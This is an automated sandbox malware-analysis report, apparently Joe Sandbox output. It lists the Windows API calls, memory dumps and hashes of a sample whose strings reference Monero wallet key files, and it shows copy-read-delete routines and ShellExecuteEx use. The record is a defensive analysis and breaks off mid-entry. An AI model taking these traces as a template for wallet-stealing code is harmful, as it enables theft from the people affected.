                            • RegOpenKeyExA.ADVAPI32(80000002,00A8B730,00000000,00020119,?), ref: 00EC7E5E
                            • RegQueryValueExA.ADVAPI32(?,00A9D640,00000000,00000000,000000FF,000000FF), ref: 00EC7E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00EC7E92
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 8b666f3de52e26a0f89397a1bf6c356d97b6cfcb8a07630610ffd92fda4b0601
                            • Instruction ID: f2d68adbbca7d86e724ec5120f5eb5e6b642304e1b3e9913a724a49d5fd01413
                            • Opcode Fuzzy Hash: 8b666f3de52e26a0f89397a1bf6c356d97b6cfcb8a07630610ffd92fda4b0601
                            • Instruction Fuzzy Hash: DC114FB2A44205EFD710CB94DD4AFBBBBB8FB44710F10415DF649A7684D77A58018BA0
                            APIs
                            • StrStrA.SHLWAPI(00A9DAE8,?,?,?,00EC140C,?,00A9DAE8,00000000), ref: 00EC926C
                            • lstrcpyn.KERNEL32(010FAB88,00A9DAE8,00A9DAE8,?,00EC140C,?,00A9DAE8), ref: 00EC9290
                            • lstrlen.KERNEL32(?,?,00EC140C,?,00A9DAE8), ref: 00EC92A7
                            • wsprintfA.USER32 ref: 00EC92C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 6b969194ee70394ef11c093793cab462d0376bd88665eeb9cbefb315c9ecfbfe
                            • Instruction ID: 964856f0569f06536b2ae599ccd332f8042c23f0fd29dd68364e2141bb1fe2ff
                            • Opcode Fuzzy Hash: 6b969194ee70394ef11c093793cab462d0376bd88665eeb9cbefb315c9ecfbfe
                            • Instruction Fuzzy Hash: 7901E575600208FFCB04DFE8D989EAE7BB9FB48354F10854CF9499B605C63AAA41DB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EB12F5
                            • RegCloseKey.ADVAPI32(?), ref: 00EB12FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 7945e58309c0ce721080f2726463c5626d4fc8d5a5ec60ff33f720596ce29fcf
                            • Instruction ID: c11813792bb56a8cb2ca41a1e0ae6a446370635cb91a053f61cef6d352d85ef3
                            • Opcode Fuzzy Hash: 7945e58309c0ce721080f2726463c5626d4fc8d5a5ec60ff33f720596ce29fcf
                            • Instruction Fuzzy Hash: B8011DB9A40208FBDB10DFE0DC4AFAEB7B8EB48705F008159FA4997284D675AA018B50
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7730544606e46d5f62b6681d8bd3b276f30118756679b5aad4f547e1871ecbd4
                            • Instruction ID: 168160fa8495a4d8089c9ece9688885c120f2708edc1a03ab5bc5c0aeae603a7
                            • Opcode Fuzzy Hash: 7730544606e46d5f62b6681d8bd3b276f30118756679b5aad4f547e1871ecbd4
                            • Instruction Fuzzy Hash: 4F4109B110075C5EDB258B24CE84FFB7BE89F45708F2454ECE98EA6182D2729A46CF60
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EC6663
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC6726
                            • ExitProcess.KERNEL32 ref: 00EC6755
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 10e5301239cd105ee9f0c9d9bee5c37025403977faaca308ec78654fe3cc63b3
                            • Instruction ID: 7cbff3d08bbaa8bafa1af72a4095346a06e13aa8283cdc22a4cf307a405cd37f
                            • Opcode Fuzzy Hash: 10e5301239cd105ee9f0c9d9bee5c37025403977faaca308ec78654fe3cc63b3
                            • Instruction Fuzzy Hash: 0A314AB1900208ABDB14EB50DE86FDD77B8AF48300F40519CF20976181DF766A4ACF69
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00ED0E28,00000000,?), ref: 00EC882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8836
                            • wsprintfA.USER32 ref: 00EC8850
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 7bfa3e65344f291b42e1dcd977eced14e62669462c2b005fbb499b3a3296983d
                            • Instruction ID: f0c19a53c1f178c36b807ba8a2505457feb73a0f29784a2a4da500f800a1d4c6
                            • Opcode Fuzzy Hash: 7bfa3e65344f291b42e1dcd977eced14e62669462c2b005fbb499b3a3296983d
                            • Instruction Fuzzy Hash: E1212EB1A44208EFDB14DF94DD4AFAEBBB8FB48711F10411DF609A7684C77A99018BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EC951E,00000000), ref: 00EC8D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8D62
                            • wsprintfW.USER32 ref: 00EC8D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e400240b4e2dad50101b2ced3136827abf195beddce9df45919524330d6a635b
                            • Instruction ID: 29457fd877270b03f7630dc2b1041a1b61af7566ac33a34c76a139761e9a412e
                            • Opcode Fuzzy Hash: e400240b4e2dad50101b2ced3136827abf195beddce9df45919524330d6a635b
                            • Instruction Fuzzy Hash: 19E08CB5B40308FFC720DB94DC0AE6977B8EB04712F040098FD4E97680DAB69E019BA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00EBA3FF
                            • lstrlen.KERNEL32(00000000), ref: 00EBA6BC
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBA743
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: c2abc3eafcace718958071512e9e5744f1afbf1517f523b307f9049be2789137
                            • Instruction ID: 232c20254453587e37b7774337f31e7ecf857e606265614dfdfdc117f6ef9c3a
                            • Opcode Fuzzy Hash: c2abc3eafcace718958071512e9e5744f1afbf1517f523b307f9049be2789137
                            • Instruction Fuzzy Hash: 16E11D7381010C9BCB18EBA4DE96FEE7378AF54304F54917DF51672091EE366A0ACB62
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBD481
                            • lstrlen.KERNEL32(00000000), ref: 00EBD698
                            • lstrlen.KERNEL32(00000000), ref: 00EBD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBD72B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: b1ba331eeb80fa7e9c3371897d19b1b938bd797fd047190af4f693b7c8cf8d8c
                            • Instruction ID: b29cd70519317dd5a8362c6510fdeca4f5c084dfbc4437147a75855a2431e585
                            • Opcode Fuzzy Hash: b1ba331eeb80fa7e9c3371897d19b1b938bd797fd047190af4f693b7c8cf8d8c
                            • Instruction Fuzzy Hash: DD911D7291010C9BCB18EBA0DE96FEE7378AF54304F54517DF516B2091EF366A0ACB62
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBD801
                            • lstrlen.KERNEL32(00000000), ref: 00EBD99F
                            • lstrlen.KERNEL32(00000000), ref: 00EBD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBDA32
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 20b91a355335323de837805b182a09dd93ca7d39883b69d326be12743b7b3209
                            • Instruction ID: 13473c18e085983a600cecc354fdbccc8daaf9703cb02b07e238b428c489098e
